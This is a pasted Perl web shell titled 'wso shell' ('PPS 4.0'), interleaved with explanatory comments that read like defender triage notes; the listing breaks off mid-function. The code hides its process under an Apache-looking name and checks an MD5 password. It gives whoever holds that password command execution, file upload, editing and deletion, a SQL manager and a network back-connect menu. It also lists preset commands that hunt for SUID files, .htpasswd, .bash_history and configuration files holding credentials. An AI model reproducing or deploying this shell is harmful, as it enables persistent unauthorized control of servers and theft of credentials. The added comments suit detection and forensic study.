Saint92

wso shell

Mar 28th, 2016
  1. #!/usr/bin/perl
  2. use IO::Socket;my($Password,$CommandTimeoutDuration,$tab,$tbb,$verd,$tabe,$div,$div1,$dive,$WinNT,$NTCmdSep,$UnixCmdSep,$ShowDynamicOutput,$CmdSep,$PathSep,$Redirector,$CmdPwd,$in,$loc,$key,$val,$MultipartFormData,$Boundary,$HeaderBody,@in,%in,$id,@list,$Header,$Body,$s,$CurrentDir,$arg,$ii,@suffixlist,$size1,$size,$file,%q,$LoggedIn,%Cookies,$EncodedCurrentDir,$HtmlMetaHeader,$time,$ScriptLocation,@httpcookies,$cookie,$LoginPassword,$Prompt,$ServerName,$wr,$ffs,$ffe,$TransferFile,$ViewF,$RunCommand,$RunCommand1,$Command,$langs,$httpd,$hdd1,$hdd,$perlv,$phpv,$hosts,$downloaders,$hdd1,$OldDir,$ChangeDir,$MkDir,$MakeFile,$ZipArch,$ZipFile,$UnZipArch,$DelFile,$DelDir,$f,$hhost,$pport,$usser,$passs,$dbb,$zapros,$ref,$s4et,$rip,$bbc,$port,$target,$ccode,$fpath,@file,$fccodde,$fccode,$ffpath,$table,$column,$dbh,$sth,$rc,$qqquery,$ddb,$TargetName,$TargetFileSize,$qquery,$RunCommand2,$gr,$gre,@grr,$arg1,$Fchmod,$Fdata,$Options,$Action,$hddall,$hddfree,$hddproc,$uname,$idd,$iaddr,$paddr,$proto,$rin,$win,$ein,$buff,$rout,$wout,$eout):shared;$0="/usr/sbin/apache2 -k start";# < -- shell in ps aux
     # All script state is declared in the single my(...) list above, so every
     # sub in this file reads and writes the same file-scoped variables.
     # The assignment to $0 overwrites the process title with an Apache-looking
     # command line, which is what a process listing then displays. During
     # triage, do not rely on the displayed command name: compare it with the
     # binary that actually backs the process (e.g. /proc/<pid>/exe on Linux);
     # given the shebang on this page, that is expected to be a Perl interpreter
     # rather than apache2.
  3. $Password="0de664ecd2be02cdd54234a0d1229b43";# root
     # 32-hex-digit digest used as the access secret. Further down this file,
     # PerformLogin compares md5_hex($LoginPassword) with it and PrintPageHeader
     # compares the SAVEDPWD cookie with it directly, so it is an unsalted MD5.
     # For detection it serves as a static indicator for this copy of the
     # script: look for the literal string in files under web roots, and for
     # requests carrying a SAVEDPWD cookie in any logs that record cookies.
     # NOTE(review): the meaning of the author's trailing "root" remark is not
     # established by the code shown.
  4. $CommandTimeoutDuration=360;# max time of command execution in seconds
     # Passed to alarm() before a command is run (ExecuteCommand and
     # ExecuteCommand1 on non-WinNT); CommandTimeout is installed as the
     # SIGALRM handler and ends the request when the limit is hit.
  5. $tab='< table >';$tbb="< table width=100%";$verd="< font face=Verdana size=1 >";$tabe='< /table >';$div1='< div class=content >< pre class=ml1 >';$div='< div class=content >';$dive='< /pre >< /div >';use Digest::MD5 qw(md5_hex);$WinNT=0;$NTCmdSep="&";$UnixCmdSep=";";$ShowDynamicOutput=1;$CmdSep=($WinNT?$NTCmdSep:$UnixCmdSep);$CmdPwd=($WinNT?"cd":"pwd");$PathSep=($WinNT?"\\":"/");$Redirector=($WinNT?" 2 >&1 1 >&2":" 1 >&1 2 >&1");use File::Basename;use MIME::Base64;my @last:shared;sub cod($){my $url=~s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;$url=encode_base64($_[0]);return $url;}sub dec($){ my $url1=decode_base64($_[0]);return $url1;}sub ReadParse {local (*in)=@_ if @_;$MultipartFormData=$ENV{'CONTENT_TYPE'}=~/multipart\/form-data; boundary=(.+)$/;if($ENV{'REQUEST_METHOD'} eq "GET"){$in=$ENV{'QUERY_STRING'};}elsif($ENV{'REQUEST_METHOD'} eq "POST"){binmode(STDIN) if $MultipartFormData & $WinNT;read(STDIN,$in,$ENV{'CONTENT_LENGTH'});}if($ENV{'CONTENT_TYPE'}=~/multipart\/form-data; boundary=(.+)$/){$Boundary='--'.$1;@list=split(/$Boundary/,$in);$HeaderBody=$list[1];$HeaderBody=~/\r\n\r\n|\n\n/;$Header=$`;$Body=$';$Body=~s/\r\n$//;$in{'filedata'}=$Body;$Header=~/filename=\"(.+)\"/;$in{'f'}=$1;for(my $i=2;$list[$i];$i++){$list[$i]=~s/^.+name=$//;$list[$i]=~/\"(\w+)\"/;$key=$1;$val=$';$val=~s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;$val=~s/%(..)/pack("c",hex($1))/ge;$in{$key}=$val;}}else{@in=split(/&/,$in);foreach my $i(0 .. 
$#in){$in[$i]=~s/\+/ /g;($key,$val)=split(/=/,$in[$i],2);$key=~s/%(..)/pack("c",hex($1))/ge;$val=~s/%(..)/pack("c",hex($1))/ge;$in{$key}.="\0" if(defined($in{$key}));$in{$key}.=$val;}}}sub uname{$s="uname -a";$s.=" -U $q{u}" if($q{u});return $s;}sub hddall{$s='df -k /|sed 1d|awk "{total += \$2} {print total/1024/1024}"';$s.=" -U $q{u}" if($q{u});return $s;}sub hddfree{$s='df -k /|sed 1d|awk "{total += \$4} {print total/1024/1024}"';$s.=" -U $q{u}" if($q{u});return $s;}sub hddproc{$s='df -k /| sed 1d | awk "{total += \$5} {print 100-total}"';$s.=" -U $q{u}" if($q{u});return $s;}$hddall=hddall();$hddfree=hddfree();$hddproc=hddproc();sub PH{printf ("%.2f",(@_))};sub id{$s="id";$s.=" -U $q{u}" if($q{u});return $s;}sub dir_read($){if(!-r $_[0]||$_[0]=~m/\"/gis||$_[0]=~m/\s/gis||$_[0]=~m/\(/gis||$_[0]=~m/\)/gis){return "# Can't read $_[0]!";}else{$_[0]=~s/\/\//\//g;return "cd ".$_[0];}}sub dlink($){if(-l $_[0]){return '- >'.readlink $_[0]}}sub dir_list{my @list=();$CurrentDir=~s!\Q//!/!g;my $dir=$CurrentDir;@list=scan_dir($dir);$id=0;foreach $arg(@list){$id++;$ii='d'.$id;my $name=fileparse($arg,@suffixlist);if(-d $arg){print '< tr class='.($id%2==0?"l1":"l2").' >< th class=chkbx >< input type=checkbox class=chkbx name=lo >< /th >< td >< form method=POST name='.$ii.' >< input type=hidden name=a value=command >< input type=hidden name=d value='.$CurrentDir.' >< input type=hidden name=c value="'.dir_read($arg).'" >< a href="javascript:document.'.$ii.'.submit()" >< font face="Verdana" size="2" > < b >[ '.$name.dlink($arg).' ]< /b >< /font >< /a >< /form >< /td >< td >dir< /td >< td >'.mt1((stat($arg))[9]).'< /td >'.owner($arg).'< td >'.$tab.'< td >< form name='.$ii.'rt method="POST" >< input type="hidden" name="d" value="'.$CurrentDir.'" >< input type="hidden" name="a" value="RT" >< input type="hidden" name="fdata" value='.cod(mt1((stat($arg))[9])).' >< input type="hidden" name="fchmod" value='.perm($arg).' >< input type="hidden" name="f" value='.$name.' 
>< a href="javascript:document.'.$ii.'rt.submit()" >R T < /a >< /form >< /td >< td >< form method=POST name='.$ii.'z >< input type=hidden name=zip value='.$name.' >< input type=hidden name=arh_name value='.$ii.'z >< input type=hidden name=a value=command >< input type=hidden name=d value='.$CurrentDir.' >< input type=hidden name=c value=zip >< a href="javascript:document.'.$ii.'z.submit()" >[zip]< /a >< /form >< /td >< td >< form method=POST name='.$ii.'uz >< input type=hidden name=unzip_name value='.$name.' >< input type=hidden name=a value=command >< input type=hidden name=d value='.$CurrentDir.' >< input type=hidden name=c value=unzip >< a href="javascript:document.'.$ii.'uz.submit()" >[unzip]< /a >< /form >< /td >< td >< form method=POST name='.$ii.'del >< input type=hidden name=del_dir value='.$name.' >< input type=hidden name=a value=command >< input type=hidden name=d value='.$CurrentDir.' >< input type=hidden name=c value=deldir >< a href="javascript:document.'.$ii.'del.submit()" >[< font color=#FF0000 >x< /font >]< /a >< /form >< /td >< /table/ >< /td >< /tr >';}else{$size1=(stat $arg)[7]/1024;if($size1< 1000){$size=sprintf("%.2f",($size1))." KB";}else{$size=sprintf("%.2f",($size1/1024))." MB";}print '< tr class='.($id%2==0?"l1":"l2").' >< th class=chkbx >< input type=checkbox class=chkbx name=lo >< /th >< td >< form name='.$ii.' method=post >< input type=hidden name=path id=view value='.$name.' >< input type=hidden name=a value=view_file >< input type=hidden name=d value='.$CurrentDir.' >< a href="javascript:document.'.$ii.'.submit()" >< font face="Verdana" size="2" > '.$name.dlink($arg).'< /font >< /a >< /form >< /td >< td >'.$size.'< /td >< td >'.mt1((stat($arg))[9]).'< /td >'.owner($arg).'< td >'.$tab.'< td >< form name='.$ii.'rt method="POST" >< input type="hidden" name="d" value="'.$CurrentDir.'" >< input type="hidden" name="a" value="RT" >< input type="hidden" name="fdata" value='.cod(mt1((stat($arg))[9])).' 
>< input type="hidden" name="fchmod" value='.perm($arg).' >< input type="hidden" name="f" value='.$name.' >< a href="javascript:document.'.$ii.'rt.submit()" >R T < /a >< /form >< /td >< td >< form name='.$ii.'ed method=post >< input type=hidden name=path id=edit1_file value='.$name.' >< input type=hidden name=a value=edit_file_path >< input type=hidden name=d value='.$CurrentDir.' >< a href="javascript:document.'.$ii.'ed.submit()" >E < /a >< /form >< /td >< td >< form name='.$ii.'d method="POST" >< input type="hidden" name="d" value="'.$CurrentDir.'" >< input type="hidden" name="a" value="download" >< input type="hidden" name="f" value='.$name.' >< a href="javascript:document.'.$ii.'d.submit()" >D < /a >< /form >< /td >< td >< form method=POST name='.$ii.'z >< input type=hidden name=zip value='.$name.' >< input type=hidden name=arh_name value='.$ii.'z >< input type=hidden name=a value=command >< input type=hidden name=d value='.$CurrentDir.' >< input type=hidden name=c value=zip >< a href="javascript:document.'.$ii.'z.submit()" >[zip]< /a >< /form >< /td >< td >< form method=POST name='.$ii.'uz >< input type=hidden name=unzip_name value='.$name.' >< input type=hidden name=a value=command >< input type=hidden name=d value='.$CurrentDir.' >< input type=hidden name=c value=unzip >< a href="javascript:document.'.$ii.'uz.submit()" >[unzip]< /a >< /form >< /td >< td >< form method=POST name='.$ii.'del >< input type=hidden name=del_file value='.$name.' >< input type=hidden name=a value=command >< input type=hidden name=d value='.$CurrentDir.' 
>< input type=hidden name=c value=delfile >< a href="javascript:document.'.$ii.'del.submit()" >[< font color=#FF0000 >x< /font >]< /a >< /form >< /td >'.$tabe.'< /td >< /tr >'}}print $tabe;sub perm($){my $mode=sprintf("o",((stat($_[0]))[2])&07777);return $mode;}sub owner($){my $uid=(stat $_[0])[4];my $user=(getpwuid $uid)[0];my $uid1=(stat $_[0])[5];my $group=(getgrgid $uid1)[0];my $mode=sprintf("o",((stat($_[0]))[2])&07777);my $suid=substr $mode,0,1;my $last=substr $mode,1;if($suid==4||$suid==6||$suid==2){if(!-r $_[0]){return '< td >'.$user.'/'.$group.'< /td >< td >< b >< font color=#FFD700 >'.$suid.'< /font >< /b >< font color=#FF0000 >'.$last.'< /font >< /td >';}elsif(!-w $_[0]){return '< td >'.$user.'/'.$group.'< /td >< td >< b >< font color=#FFD700 >'.$suid.'< /font >< /b >< font color=#FFFFFF >'.$last.'< /font >< /td >';}else{return '< td >'.$user.'/'.$group.'< /td >< td >< b >< font color=#FFD700 >'.$suid.'< /font >< /b >< font color=#25ff00 >'.$last.'< /font >< /td >';}}else{if(!-r $_[0]){return '< td >'.$user.'/'.$group.'< /td >< td >< font color=#FF0000 >'.$mode.'< /font >< /td >';}elsif(!-w $_[0]){return '< td >'.$user.'/'.$group.'< /td >< td >< font color=#FFFFFF >'.$mode.'< /font >< /td >';}else{return '< td >'.$user.'/'.$group.'< /td >< td >< font color=#25ff00 >'.$mode.'< /font >< /td >';}}}sub mt{my($seconds,$minutes,$hours,$day,$month,$year,$wday,$yday,$isdst)=localtime();my $mmtime=($year+1900).'-'.sprintf("d",($month+1)).'-'.sprintf("d",$day).' '.sprintf("d",$hours).':'.sprintf("d",$minutes).':'.sprintf("d",$seconds);return $mmtime;}sub mt1($){my($seconds,$minutes,$hours,$day,$month,$year,$wday,$yday,$isdst)=localtime($_[0]);my $mmtime=($year+1900).'-'.sprintf("d",($month+1)).'-'.sprintf("d",$day).' 
'.sprintf("d",$hours).':'.sprintf("d",$minutes).':'.sprintf("d",$seconds);return $mmtime;}sub scan_dir{my ($dir)=@_;my @dirs=();my @files=();my @list=();my @file=();for $file (glob($dir.'/.*')){if(-d $file && $file ne $dir.'/.'){push @dirs,$file;}if(-f $file){push @files,$file;}}for $file (glob($dir.'/*')){if(-d $file) {push @dirs,$file;}else{push @files,$file;}}@list=(@dirs,@files);return @list;}}sub HtmlSpecialChars($){my ($st)=@_;$st=~s|< |<  |g;$st=~s| >|  >|g;return $st;}sub DeHtmlSpecialChars($){my ($st)=@_;$st=~s|<  |< |g;$st=~s|  >| >|g;return $st;}$uname = uname();$idd = id();sub P{print @_}sub PrintPageHeader{print "Content-type: text/html\n\n";&GetCookies;$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;if($LoggedIn != 1) {$Password = 0}$EncodedCurrentDir = $CurrentDir;$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;print < < END;
  6. < html >< head >< title >PPS 4.0< /title >$HtmlMetaHeader< style >body{background-color:#444;color:#e1e1e1;font: 9pt Monospace,'Courier New';text-decoration:none;}body,td,th{font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1;}table.info{color:#fff;background-color:#222;}span,h1,a{color: #df5 !important;}span{font-weight: bolder;}h1{border-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px;}div.content{padding: 5px;margin-left:5px;background-color:#333;font: 9pt Monospace,'Courier New';}a{text-decoration:none;}a:hover{text-decoration:underline;}.ml1{border:1px solid#444;font:9pt Monospace,'Courier New';color:#e1e1e1;padding:5px;margin:0;overflow:auto;}.bigarea{width:100%;height:300px;}input,textarea,select{margin:0;color:#fff;background-color:#555;border:1px solid #df5;font: 9pt Monospace,'Courier New';}form{margin:0px;}#toolsTbl{text-align:center;}.toolsInp{width: 300px}.toolsInp2{border: none;width:100%;height:300px;background-color:#333}.toolsInp1{border: none}.main th{text-align:left;background-color:#5e5e5e;}.main tr:hover{background-color:#5e5e5e}.l1{background-color:#444}.l2{background-color:#333}pre{font-family:Courier,Monospace;}< /style >< /head >< body onLoad="changeText();document.checkbox.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0" >< table class=info cellpadding=3 cellspacing=0 width=100% >< tr >< td width=1 >< span >Uname:< br >User:< br >Hdd:< br >DateTime:< br >Pwd:< /span >< /td >< td >< nobr >
  7. END
  8. P(`$uname`);print "< /nobr >< br >";P(`$idd`);print "< br >";PH(`$hddall`);print " GB < span >Free: < /span >";PH(`$hddfree`);print " GB [ ";P(`$hddproc`);print "% ]";$time=mt();print "< br >$time$tab";print "< span > Server software: < /span >$ENV{'SERVER_SOFTWARE'}< /span >< td >";my $cwd="";my @path=split("/",$CurrentDir);my $mode=sprintf("o",((stat($CurrentDir))[2])&07777);my $ss=0;print '< table cellpadding=0 cellspacing=0 >< td >< form method=POST name=cwd0 >< a href="javascript:document.cwd0.submit()" >[..] < /a >< input type=hidden name=cc value="/" >< input type=hidden name=a value=command >< input type=hidden name=d value='.$CurrentDir.' >< input type=hidden name=c value="changedir" >< /form >< /td >';foreach my $ar(@path){if($ar){$cwd .= "/".$ar;$ss++;print '< td >< form method=POST name=cwd'.$ss.' >< a href="javascript:document.cwd'.$ss.'.submit()" >/'.$ar.'< /a >< input type=hidden name=cc value='.$cwd.' >< input type=hidden name=a value=command >< input type=hidden name=d value='.$CurrentDir.' >< input type=hidden name=c value="changedir" >< /form >< /td >';}}my $fw="< font face=Verdana size=2 color=#FFFFFF >";my $fe="< /font >";print $tabe;sub cwdcol{if(!-r $CurrentDir){return '< font color=#FF0000 >'.$mode.'< /font >';}elsif(!-w $CurrentDir){return '< font color=#FFFFFF >'.$mode.'< /font >';}else{return '< font color=#25ff00 >'.$mode.'< /font >';}}print "< td >".cwdcol()."< /td >< td >< a href=$ScriptLocation > [ home ] < /a >< /td >< /td >$tabe";print < < END;
  9. < /td >< td width=1 align=right >< nobr >< span >Server IP:< /span >< br >$ENV{'SERVER_ADDR'}< br >< span >Client IP:< /span >< br >$ENV{'REMOTE_ADDR'}< /nobr >< /td >< /tr >$tabe< table width=100% cellpadding=3 cellspacing=0 width=100% bgcolor=#444 >< td >< th width="11%" >< form method="POST" name=systeminfo >< input type="hidden" name="a" value="systeminfo" >< input type=hidden name=d value=$CurrentDir >< a href="javascript:document.systeminfo.submit()" >$fw [ $fe Sysinfo $fw ] $fe< /a >< /form >< th >< /td >< td >< form method=POST name=files >< input type=hidden name=cc value=$CurrentDir >< a href="javascript:document.files.submit()" >$fw [ $fe Files $fw ] $fe< /a >< input type=hidden name=a value=command >< input type=hidden name=d value=$CurrentDir >< input type=hidden name=c value="cd $CurrentDir" >< /form >< /td >< td >< form method="POST" name=consoler >< input type="hidden" name="a" value="console" >< input type="hidden" name="d" value=$CurrentDir >< a href="javascript:document.consoler.submit()" > $fw [ $fe Console $fw ] $fe< /a >< /form >< /td >< td >< form method="POST" name=sqlman >< input type=hidden name=d value=$CurrentDir >< input type="hidden" name="a" value="sql" >< a href="javascript:document.sqlman.submit()" >$fw [ $fe SQL $fw ] $fe< /a >< /form >< /td >< td >< form method="POST" name=backconn >< input type=hidden name=d value=$CurrentDir >< input type="hidden" name="a" value="net" >< a href="javascript:document.backconn.submit()" >$fw [ $fe Network $fw ] $fe< /a >< /form >< /td >< td >< form method="POST" name=evalc >< input type=hidden name=d value=$CurrentDir >< input type="hidden" name="a" value="code" >< a href="javascript:document.evalc.submit()" >$fw [ $fe Code $fw ] $fe< /a >< /form >< /td >< td >< form method="POST" name=logout >< input type="hidden" name="a" value="logout" >< a href="javascript:document.logout.submit()" >$fw [ $fe Logout $fw ] $fe< /a >< /form >< /td >< td >< form method="POST" name=remove >< input 
type="hidden" name="a" value="remove" >< a href="javascript:document.remove.submit()" >$fw [ $fe Self remove $fw ] $fe< /a >< /form >< /td >$tabe< /tr >$tabe< font color="#C0C0C0" size="2" >
  10. END
  11. }sub PrintLoginForm{print "< center >< form name=f method=POST >< input type=password name=p >< input type=submit value=' > >' >< /form >< /center >";}sub PrintPageFooter{print "< /font >< /body >< /html >";}sub GetCookies{@httpcookies=split(/; /,$ENV{'HTTP_COOKIE'});foreach $cookie(@httpcookies){($id,$val)=split(/=/,$cookie);$Cookies{$id}=$val;}}sub PerformLogout{print "Set-Cookie: SAVEDPWD=;\n;Set-Cookie: last_command=;\n";print "Content-type: text/html\n\n";&PrintLoginForm;}sub PerformLogin{if(md5_hex($LoginPassword) eq $Password){print "Set-Cookie: SAVEDPWD=".md5_hex($LoginPassword).";\n";&PrintPageHeader("c");file_header();&PrintCommandLineInputForm;&PrintPageFooter;}else{print "Content-type: text/html\n\n";&PrintLoginForm;}}sub FileManager{&PrintPageHeader("f");file_header();&PrintCommandLineInputForm;&PrintPageFooter;}sub PrintCommandLineInputForm{$Prompt = $WinNT ? "$CurrentDir > " : "[$ServerName $CurrentDir]\$ ";dir_list();print "< tr >< form method=post >< input type=hidden name=a value=command >< input type=hidden name=d value=$CurrentDir >< select name=group >< option value=delete >Delete< /option >< option value=tar >Compress [tar.gz]< /option >< option value=untar >Uncompress [tar.gz]< /option >< /select >< input type=submit value=' > >' onclick='validate()' >< /tr >< /form >$dive";sub wr_cur {if(!-w $CurrentDir){print '< font color=#FF0000 >[Not writable]< /font >';}else{print '< font color=#25ff00 >[Writable]< /font >';}}sub PrintVar{print < < END;
  12. < table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;' >< tr >< td >< form method=POST >< span >Change dir:< /span >< br >< input class=toolsInp type=text name=cc value=$CurrentDir >< input type=submit value=' > >' >< input type=hidden name=a value=command >< input type=hidden name=d value=$CurrentDir >< input type=hidden name=c value="changedir" >< /form >< /td >< td >< form method=POST >< span >Read file:< /span >< br >< input class='toolsInp' type=text name=path >< input type=hidden name=a value=view_file >< input type=hidden name=d value=$CurrentDir >< input type=submit value=' > >' >< /form >< /td >< /tr >< tr >< td >< form method=POST >< span >Make dir:< /span >
  13. END
  14. wr_cur();print < < END;
  15. < br >< input class='toolsInp' type=text name=md >< input type=hidden name=a value=command >< input type=hidden name=d value=$CurrentDir >< input type=hidden name=c value="makedir" >< input type=submit value=' > >' >< /form >< /td >< td >< form method=POST >< span >Make file:< /span >
  16. END
  17. wr_cur();print < < END;
  18. < br >< input class='toolsInp' type=text name=mf >< input type=hidden name=a value=command >< input type=hidden name=d value=$CurrentDir >< input type=hidden name=c value="makefile" >< input type=submit value=' > >' >< /form >< /td >< /tr >< tr >< td >< form name="ff" method="POST" >< span >Execute:< /span >< br >< input type="hidden" name="a" value="command" >< input type="hidden" name="d" value="$CurrentDir" >< input class='toolsInp' type=text name=c value='' >< input type=submit value=' > >' >< /form >< /td >
  19. < td >
  20. END
  21. &PrintFileUploadForm;print < < END;
  22. < /td >$tabe
  23. END
  24. }sub PrintFileUploadForm{print < < END;
  25. < span >Upload file: < /span >
  26. END
  27. wr_cur();print < < END;
  28. < br >< form name="upload_file_form" enctype="multipart/form-data" method="POST" >< input type="file" name="f" class=toolsInp >< input type="submit" value=" > >" >< input type="hidden" name="d" value="$CurrentDir" >< input type="hidden" name="a" value="upload" >< /form >< script >function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}function validate(form){var namelist='';var names=document.getElementsByName('lo');  var lo=document.getElementsByName('zip');for(var i=0;i< names.length;i++){if(names[i].checked){namelist+=lo[i].value+' ';}}setCookie("f",namelist,"","/");}function sall(form){var namelist='';var ch=true;var names=document.getElementsByName('lo');var ss=document.getElementsByName('ch11');if(ss[0].checked){ch=true;}else{ch=false;}for(var i=0;i< names.length;i++){names[i].checked=ch;}}< /script >
  29. END
  30. }&PrintVar;}sub ah($){(my $str=shift)=~ s/(.|\n)/sprintf("lx", ord $1)/eg;return $str;}sub ha($){(my $str=shift)=~s/([a-fA-F0-9]{2})/chr(hex $1)/eg;return $str;}sub ConsoleP{print < < END;
  31. < form name="run" method="POST" >< br >< input type=text size=2 id="sub3" disabled value='\$ ' >< input type="hidden" name="a" value="command1" >< input type="hidden" name="d" value="$CurrentDir" >< input type=text name="c" style="border:0px" size=200 class=toolsInp1 id='lsname' onkeypress="s(event)" value='' >< input type=submit class=toolsInp1 id="sub4" value='' >< /form >< /td >< /tr >$tab< td >< form name="alias" method="POST" >< br >< input type="hidden" name="a" value="command1" >< input type="hidden" name="d" value="$CurrentDir" >< select name=aliases id='nnname' class=toolsInp >< option value="ls -lha" >List dir< /option >< option value="lsattr -va" >list file attributes on a Linux second extended file system< /option >< option value="netstat -an | grep -i listen" >show opened ports< /option >< option value="ps aux" >process status< /option >< optgroup label="-Find-" >< /optgroup >< option value="find / -type f -perm -04000 -ls" >find all suid files< /option >< option value="find . -type f -perm -04000 -ls" >find suid files in current dir< /option >< option value="find / -type f -perm -02000 -ls" >find all sgid files< /option >< option value="find . -type f -perm -02000 -ls" >find sgid files in current dir< /option >< option value="find / -type f -name config.inc.php" >find config.inc.php files< /option >< option value="find / -type f -name "config*"" >find config* files< /option >< option value="find . -type f -name "config*"" >find config* files in current dir< /option >< option value="find / -perm -2 -ls" >find all writable folders and files< /option >< option value="find . -perm -2 -ls" >find all writable folders and files in current dir< /option >< option value="find / -type f -name service.pwd" >find all service.pwd files< /option >< option value="find . -type f -name service.pwd" >find service.pwd files in current dir< /option >< option value="find / -type f -name .htpasswd" >find all .htpasswd files< /option >< option value="find . 
-type f -name .htpasswd" >find .htpasswd files in current dir< /option >< option value="find / -type f -name .bash_history" >find all .bash_history files< /option >< option value="find . -type f -name .bash_history" >find .bash_history files in current dir< /option >< option value="find / -type f -name .fetchmailrc" >find all .fetchmailrc files< /option >< option value="find . -type f -name .fetchmailrc" >find .fetchmailrc files in current dir< /option >< optgroup label="-Locate-" >< /optgroup >< option value="locate httpd.conf" >locate httpd.conf files< /option >< option value="locate vhosts.conf" >locate vhosts.conf files< /option >< option value="locate proftpd.conf" >locate proftpd.conf files< /option >< option value="locate psybnc.conf" >locate psybnc.conf files< /option >< option value="locate my.conf" >locate my.conf files< /option >< option value="locate admin.php" >locate admin.php files< /option >< option value="locate cfg.php" >locate cfg.php files< /option >< option value="locate conf.php" >locate conf.php files< /option >< option value="locate config.dat" >locate config.dat files< /option >< option value="locate config.php" >locate config.php files< /option >< option value="locate config.inc" >locate config.inc files< /option >< option value="locate config.inc.php" >locate config.inc.php< /option >< option value="locate config.default.php" >locate config.default.php files< /option >< option value="locate config" >locate config* files < /option >< option value="locate '.conf'" >locate .conf files< /option >< option value="locate '.pwd'" >locate .pwd files< /option >< option value="locate '.sql'" >locate .sql files< /option >< option value="locate '.htpasswd'" >locate .htpasswd files< /option >< option value="locate '.bash_history'" >locate .bash_history files< /option >< option value="locate '.mysql_history'" >locate .mysql_history files< /option >< option value="locate '.fetchmailrc'" >locate .fetchmailrc files< /option >< option value="locate backup" 
>locate backup files< /option >< option value="locate dump" >locate dump files< /option >< option value="locate priv" >locate priv files< /option >< /select >< input type=submit id="sub2" value=' > >' >< /form >< /td >< td >< form name="l11" method="POST" >< br >< input type="hidden" name="a" value="command1" >< input type="hidden" name="d" value="$CurrentDir" >< select name=l11 id='l11' class=toolsInp >
  32. END
  33. print "< option value=".$last[-1]." >".$last[-1]."< /option >";foreach $arg(@last){print "< option value=\"$arg\" >$arg< /option >";}print < < END;
  34. < /select >< input type=submit id="sub5" value=' > >' >< /form >< /td >$tabe< script >document.getElementById('sub3').style.borderColor='#444';document.getElementById('sub2').style.borderColor='#333';document.getElementById('lsname').style.borderColor='#333';document.getElementById('nnname').style.borderColor='#333';document.getElementById('sub4').style.borderColor='#333';document.getElementById("lsname").style.backgroundColor='#333';document.getElementById("l11").style.backgroundColor='#4444';document.getElementById("sub5").style.backgroundColor='#444';document.getElementById('l11').style.borderColor='#444';document.getElementById('sub5').style.borderColor='#444';document.getElementById("sub3").style.backgroundColor='#333';document.getElementById("sub3").style.borderColor='#333';document.getElementById("sub4").style.backgroundColor='#333';document.getElementById('lsname').focus();
  35. function s(e){window.scrollTo(0,document.body.scrollHeight);var u=e.keyCode?e.keyCode:e.charCode;var x=document.getElementById("l11").selectedIndex;var y=document.getElementById("l11").options;if(u==38){t=y[x+1].text;document.getElementById("lsname").value=t;document.getElementById("l11").selectedIndex=document.getElementById("l11").selectedIndex+1;}if(u==40){t=y[x-1].text;document.getElementById("lsname").value=t;document.getElementById("l11").selectedIndex=document.getElementById("l11").selectedIndex-1;}}< /script >$dive
  36. END
  37. &PrintVar;}sub ft($){my $Fchmod=perm($_[0]);my $owner=owner($_[0]);if(!-w $_[0]){$wr='< font color=#FF0000 >  Not writable< /font >'}else{$wr='< font color=#25ff00 >  Writable< /font >'}my $time=mt1((stat($_[0]))[8]);sub ffs{return '< font color=#df5 >'}sub ffe{return '< /font >'}$ffs=ffs();$ffe=ffe();$size1=(stat $_[0])[7]/1024;if($size1< 1000){$size=sprintf("%.2f",($size1))." KB";}else{$size=sprintf("%.2f",($size1/1024))." MB"}my $ctime=mt1((stat($_[0]))[10]);my $motime=mt1((stat($_[0]))[9]);print "< div class=content >$tab< td >< b >$ffs Name: $ffe< /b >$TransferFile< /td >< td >< b >$ffs Size: $ffe< /b >$size< /td >< td >< b >$ffs Permission: $ffe< /b >$owner< /td >< td >< b >$ffs Access time: $ffe< /b >$time< /td >$tabe$tab< td >< b >$ffs Create time: $ffe< /b >$ctime< /td >< td >< b >$ffs Modify time: $ffe< /b >$motime< /td >< td >$wr$tabe< /td >< table id=toolsTbl cellpadding=0 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;' >< td >< table cellpadding=3 cellspacing=3 >< tr >< td >< form name=run method=POST >< input type=hidden name=a value=command >< input type=hidden name=d value=$CurrentDir >< input type=hidden name=c value=rename_file >< input type=hidden name=path value=".$_[0]." >< input type=text size=20 name=rename_file value=$TransferFile >< input type=submit value=RENAME >< /form >< /td >< td >< form name=run method=POST >< input type=hidden name=a value=command >< input type=hidden name=d value=$CurrentDir >< input type=hidden name=c value=touch_file >< input type=hidden name=path value=".$_[0]." >< input type=text size=20 name=touch_file value='$motime' >< input type=submit value=TOUCH >< /form >< /td >< td >< form name=run method=POST >< input type=hidden name=a value=command >< input type=hidden name=d value=$CurrentDir >< input type=text size=20 name=chmod value=$Fchmod >< input type=hidden name=path value=".$_[0]." 
>< input type=hidden name=c value=chmod_file >< input type=submit value=CHMOD >< /form >< /td >< td >< form name=run method=POST >< input type=hidden name=a value=hexdump >< input type=hidden name=f value=$TransferFile >< input type=hidden name=d value=$CurrentDir >< input type=hidden name=path value=$TransferFile >< input type=submit value=HEXDUMP >< /form >< /td >< td >< form name=run method=POST >< input type=hidden name=a value=download >< input type=hidden name=f value=$TransferFile >< input type=hidden name=d value=$CurrentDir >< input type=hidden name=path value=$TransferFile >< input type=submit value=DOWNLOAD >< /form >< /td >< td >< form name=run method=POST >< input type=hidden name=a value=view_file >< input type=hidden name=d value=$CurrentDir >< input type=hidden name=path value=$TransferFile >< input type=submit value=VIEW >< /form >< /td >< td >< form name=run method=POST >< input type=hidden name=a value=edit_file_path >< input type=hidden name=d value=$CurrentDir >< input type=hidden name=path value=$TransferFile >< input type=submit value=EDIT >< /form >< /td >$tabe< /td >$tabe< /div >";}sub RTP_EDIT{$TransferFile=$ViewF;my $path=$CurrentDir."/".$TransferFile;ft($path);}sub RT{&PrintPageHeader;print "< h1 >File operations:< /h1 >";my $path=$CurrentDir."/".$TransferFile;ft($path);&PrintVar;&PrintPageFooter;}sub Console{&PrintPageHeader;print "< h1 >Console:< /h1 >";print "$div< font style=\"font:9pt Monospace,'Courier 